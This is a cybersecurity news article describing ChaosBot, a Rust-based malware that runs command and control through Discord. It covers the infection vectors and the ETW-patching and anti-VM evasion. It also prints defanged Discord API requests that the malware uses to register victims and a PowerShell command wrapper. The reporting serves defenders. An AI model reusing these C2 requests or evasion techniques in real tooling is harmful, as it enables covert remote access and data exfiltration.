New Rust-Based ChaosBot Malware Leverages Discord for Stealthy Command and Control

A sophisticated new threat has emerged in the cybersecurity landscape, leveraging the popular communication platform Discord to conduct covert operations.

ChaosBot, a Rust-based malware strain, represents an evolution in adversarial tactics by hiding malicious command and control traffic within legitimate cloud service communications.

This approach allows attackers to blend seamlessly into normal network traffic, making detection significantly more challenging for traditional security solutions.

The malware operates through a carefully orchestrated infection chain that begins with either compromised VPN credentials or phishing campaigns using malicious Windows shortcut files.

Once executed, ChaosBot establishes persistent access by validating its Discord bot token and creating a dedicated private channel named after the victim’s computer.

This channel becomes an interactive command shell where attackers issue commands such as shell, download, and scr (screenshot), with results exfiltrated back as attached files through Discord’s API.

Picussecurity researchers identified the malware’s sophisticated evasion capabilities, which include patching the Windows Event Tracing (ETW) function to blind endpoint detection systems and performing anti-virtualization checks against known MAC address prefixes for VMware and VirtualBox environments.

These techniques demonstrate a deliberate effort to evade analysis in sandboxed security research environments.

Discord-Based Command and Control Infrastructure

ChaosBot’s technical implementation reveals a well-engineered C2 protocol built entirely on Discord’s API infrastructure.

Written in Rust and utilizing the reqwest or serenity library, the malware maintains communication through standard HTTPS requests that appear identical to legitimate Discord traffic.

Upon initial execution, ChaosBot validates its embedded bot token with a GET request to hxxps://discord[.]com/api/v10/users/@me.

Following successful authentication, it creates a victim-specific channel using a POST request:-

POST hxxps://discord[.]com/api/v10/guilds/<THREAT_ACTOR_GUILD_ID>/channels 
{"name":"<VICTIM_COMPUTER_NAME>","type":0}

Command execution relies on a continuous polling mechanism that checks for new messages in the victim’s channel.

When operators issue shell commands, ChaosBot forces UTF8 encoding through PowerShell: powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; <SOME_COMMAND>".

The command output, screenshots, or downloaded files are then uploaded back to Discord as multipart/form-data attachments, creating a fully functional remote access capability through a platform trusted by most corporate firewalls and security appliances.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.